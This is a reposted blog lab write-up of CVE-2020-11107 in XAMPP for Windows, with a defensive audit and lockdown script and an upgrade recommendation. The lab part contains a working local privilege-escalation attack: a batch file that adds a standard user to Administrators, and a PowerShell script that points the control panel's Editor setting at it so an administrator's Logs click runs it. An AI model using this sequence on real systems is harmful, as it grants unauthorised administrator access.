CVE-2020-11107: XAMPP Arbitrary Command Execution Vulnerability

Contents

1. XAMPP Overview

2. Root Cause

3. Affected Versions

4. Lab Setup

Download XAMPP

Check the root account and add the account lower

Log in as lower

Create the script conn.bat

Run XAMPP

Escalate to administrator

Thoughts


1. XAMPP Overview

XAMPP (Apache + MySQL + PHP + Perl) is a full-featured, integrated web-server package.

The package was originally called LAMPP, but to avoid confusion the more recent releases were renamed XAMPP. It installs and runs on Windows, Linux, Solaris, macOS and other operating systems and ships in several languages. XAMPP really is easy to install and use: download, unpack, start. It is comparable to phpStudy.

2. Root Cause

On Windows, XAMPP lets a non-administrator account read and modify the control panel's Editor and Browser settings (kept in xampp-control.ini; the default editor is notepad.exe). The setting is not per-user: once changed, it applies to every account that opens the XAMPP control panel. If an attacker points the editor at a malicious .exe or .bat file and an administrator later views the Apache log files through the control panel's Logs button, the control panel launches that file in the administrator's context, giving the attacker arbitrary command execution with administrator privileges.

3. Affected Versions

Apache Friends XAMPP < 7.2.29

Apache Friends XAMPP 7.3.x, < 7.3.16

Apache Friends XAMPP 7.4.x, < 7.4.4

4. Lab Setup

Download XAMPP

Check the root account and add the account lower

The administrator account in this lab is named root; lower is a standard (non-administrator) user.

Log in as lower

Create the script conn.bat

As lower, create conn.bat; its purpose is to add lower to the local Administrators group:

@echo off
REM Only succeeds when run with administrator privileges, which is exactly
REM what the XAMPP control panel supplies when it launches the "editor".
net localgroup administrators lower /add

Run XAMPP

Save the script. Then switch to the root account, right-click the XAMPP control panel and run it as administrator; open the Apache logs from the control panel so that the configured "editor" is launched.

Escalate to administrator

Run the following command to confirm the group membership:


Thoughts

Looking back at the whole process, XAMPP is merely an extra hop; the core of it is running, with administrator privileges, a command that adds a user to the Administrators group:

net localgroup administrators lower /add   ; an administrator can of course run this directly;

As it stands, the lab amounts to placing that command into XAMPP's configuration (the editor entry in Config), with the Logs button being the trigger for the whole command execution: if nobody presses the Logs button, the command that adds the user to the Administrators group never runs.
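The configuration change that section 2 describes and that the lab relies on, namely pointing the control panel's editor at conn.bat, as an added PowerShell example that is not part of the original post. It assumes XAMPP is installed in C:\xampp, that the control panel keeps its settings in C:\xampp\xampp-control.ini under the key Editor= (default notepad.exe), and that conn.bat was saved as C:\Users\lower\conn.bat. Run it in a non-elevated PowerShell as lower:

```powershell
# Added example, not from the original post: the low-privilege tampering step.
# Assumptions (not stated in the post): XAMPP root C:\xampp, settings file
# xampp-control.ini, editor key "Editor=" (default notepad.exe), payload path below.
$ini     = 'C:\xampp\xampp-control.ini'
$payload = 'C:\Users\lower\conn.bat'

if (-not (Test-Path $ini)) { throw "settings file not found: $ini" }

# Show the current value, then repoint the key at the batch file. The regex keeps
# the "Editor=" prefix (capture group 1) and replaces only the value.
$before = Get-Content -Path $ini
$before | Select-String -Pattern '^\s*Editor\s*='
$after  = $before -replace '^(\s*Editor\s*=).*$', ('${1}' + $payload)

try {
    Set-Content -Path $ini -Value $after -ErrorAction Stop
} catch {
    # A fixed release, or a file whose ACL was tightened, refuses the write here:
    # a standard user must be able to modify the shared settings file for the
    # attack to work at all.
    throw "cannot write $ini as $env:USERNAME - not vulnerable as configured: $_"
}

# Confirm the change took. From now on, whenever an administrator opens the control
# panel and presses the Logs button, the panel runs $payload in the administrator's
# context, which is the elevation the lab demonstrates.
Select-String -Path $ini -Pattern '^\s*Editor\s*='
```

The write in the middle is the whole vulnerability: nothing in the control panel checks who changed Editor= or what it points to, so the administrator's Logs click simply executes whatever path is there.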

Below is the install file from the apache/logs folder:

Installing Apache HTTP Server 2.x with
 DomainName    = example.com
 ServerName    = www.example.com
 ServerAdmin   = [email protected]
 ServerPort    = 80
 ServerSslPort = 443
 ServerRoot    = c:/Apache24
Rewrote docs/conf/extra/httpd-autoindex.conf.in
 to c:/Apache24/conf/original/extra/httpd-autoindex.conf
Rewrote docs/conf/extra/httpd-default.conf.in
 to c:/Apache24/conf/original/extra/httpd-default.conf
Rewrote docs/conf/extra/httpd-ssl.conf.in
 to c:/Apache24/conf/original/extra/httpd-ssl.conf
Rewrote docs/conf/extra/httpd-multilang-errordoc.conf.in
 to c:/Apache24/conf/original/extra/httpd-multilang-errordoc.conf
Rewrote docs/conf/extra/httpd-info.conf.in
 to c:/Apache24/conf/original/extra/httpd-info.conf
Rewrote docs/conf/extra/httpd-userdir.conf.in
 to c:/Apache24/conf/original/extra/httpd-userdir.conf
Rewrote docs/conf/extra/httpd-mpm.conf.in
 to c:/Apache24/conf/original/extra/httpd-mpm.conf
Rewrote docs/conf/httpd.conf.in
 to c:/Apache24/conf/original/httpd.conf
Rewrote docs/conf/extra/proxy-html.conf.in
 to c:/Apache24/conf/original/extra/proxy-html.conf
Rewrote docs/conf/extra/httpd-vhosts.conf.in
 to c:/Apache24/conf/original/extra/httpd-vhosts.conf
Rewrote docs/conf/extra/httpd-dav.conf.in
 to c:/Apache24/conf/original/extra/httpd-dav.conf
Rewrote docs/conf/extra/httpd-languages.conf.in
 to c:/Apache24/conf/original/extra/httpd-languages.conf
Rewrote docs/conf/extra/httpd-manual.conf.in
 to c:/Apache24/conf/original/extra/httpd-manual.conf
Duplicated c:/Apache24/conf/original/extra/httpd-autoindex.conf
 to c:/Apache24/conf/extra/httpd-autoindex.conf
Duplicated c:/Apache24/conf/original/extra/httpd-default.conf
 to c:/Apache24/conf/extra/httpd-default.conf
Duplicated c:/Apache24/conf/original/extra/httpd-ssl.conf
 to c:/Apache24/conf/extra/httpd-ssl.conf
Duplicated c:/Apache24/conf/original/extra/httpd-multilang-errordoc.conf
 to c:/Apache24/conf/extra/httpd-multilang-errordoc.conf
Duplicated c:/Apache24/conf/original/extra/httpd-info.conf
 to c:/Apache24/conf/extra/httpd-info.conf
Duplicated c:/Apache24/conf/original/extra/httpd-userdir.conf
 to c:/Apache24/conf/extra/httpd-userdir.conf
Duplicated c:/Apache24/conf/original/extra/httpd-mpm.conf
 to c:/Apache24/conf/extra/httpd-mpm.conf
Duplicated c:/Apache24/conf/original/httpd.conf
 to c:/Apache24/conf/httpd.conf
Duplicated c:/Apache24/conf/original/magic
 to c:/Apache24/conf/magic
Duplicated c:/Apache24/conf/original/charset.conv
 to c:/Apache24/conf/charset.conv
Duplicated c:/Apache24/conf/original/extra/proxy-html.conf
 to c:/Apache24/conf/extra/proxy-html.conf
Duplicated c:/Apache24/conf/original/extra/httpd-vhosts.conf
 to c:/Apache24/conf/extra/httpd-vhosts.conf
Duplicated c:/Apache24/conf/original/extra/httpd-dav.conf
 to c:/Apache24/conf/extra/httpd-dav.conf
Duplicated c:/Apache24/conf/original/mime.types
 to c:/Apache24/conf/mime.types
Duplicated c:/Apache24/conf/original/extra/httpd-languages.conf
 to c:/Apache24/conf/extra/httpd-languages.conf
Duplicated c:/Apache24/conf/original/extra/httpd-manual.conf
 to c:/Apache24/conf/extra/httpd-manual.conf

In the error file (Apache's error log) you can see the trace of the command being executed.

Whether the command runs at all is decided by where the configuration points.

The control panel is necessarily governed by its configuration file: how it behaves and what it controls.

A practical fix is to deny ordinary users (and even ordinary administrator accounts) write access to that file, leaving it to the super-administrator only;

For example:
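An added example, not from the original post, of the audit and lockdown suggested above, from the administrator's side: read back what the Logs button will launch, list who can write the settings file, and then restrict it. Same assumptions as the lab: C:\xampp\xampp-control.ini with an Editor= key. Run from an elevated PowerShell:

```powershell
# Added example, not from the original post: audit and lock down the control
# panel settings file. Assumes C:\xampp\xampp-control.ini and an "Editor=" key.
$ini = 'C:\xampp\xampp-control.ini'

# 1. What will the Logs button launch? Anything other than notepad.exe deserves a
#    look; a script extension or a user-writable location is a strong tampering signal.
$m = Select-String -Path $ini -Pattern '^\s*Editor\s*=\s*(.*?)\s*$' | Select-Object -First 1
if (-not $m) { throw "no Editor= key found in $ini" }
$editor = $m.Matches[0].Groups[1].Value
Write-Host "Editor = $editor"

$badPatterns = @('\.(bat|cmd|ps1|vbs|js)$', '^[A-Za-z]:\\Users\\', '\\Temp\\', '\\xampp\\')
$isDefault   = ($editor -eq 'notepad.exe')
$hits        = $badPatterns | Where-Object { $editor -match $_ }
if (-not $isDefault -and $hits) {
    Write-Warning "Editor points at '$editor' - possible CVE-2020-11107 tampering"
}

# 2. Who can write the file today? Allow entries for Users / Authenticated Users /
#    Everyone with Write, Modify or FullControl are the precondition for the attack.
$writers = (Get-Acl -Path $ini).Access | Where-Object {
    ($_.AccessControlType -eq 'Allow') -and
    ($_.FileSystemRights.ToString() -match 'Write|Modify|FullControl')
}
$writers | Select-Object IdentityReference, FileSystemRights, IsInherited | Format-Table -AutoSize
$lowPriv = $writers | Where-Object { $_.IdentityReference -match 'Users|Everyone' }
if ($lowPriv) { Write-Warning "standard users can modify $ini" }

# 3. Lock it down: drop inherited ACEs, give Administrators and SYSTEM full control,
#    leave standard users read-only. The panel can still read its settings, but a
#    non-admin can no longer repoint Editor= for everyone else.
icacls $ini /inheritance:r /grant:r 'Administrators:F' 'SYSTEM:F' 'Users:R'

# 4. Read the ACL back to confirm.
(Get-Acl -Path $ini).AccessToString
```

Users:R keeps the file readable for everyone, but it also means a non-administrator running the control panel can no longer save its own settings (window position, autostart choices and the like) into that same file; that is the trade-off of a file-level workaround. The real fix is to upgrade XAMPP to a release outside the affected ranges listed in section 3.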


The end!!!

Reposted from blog.csdn.net/weixin_43650289/article/details/109026239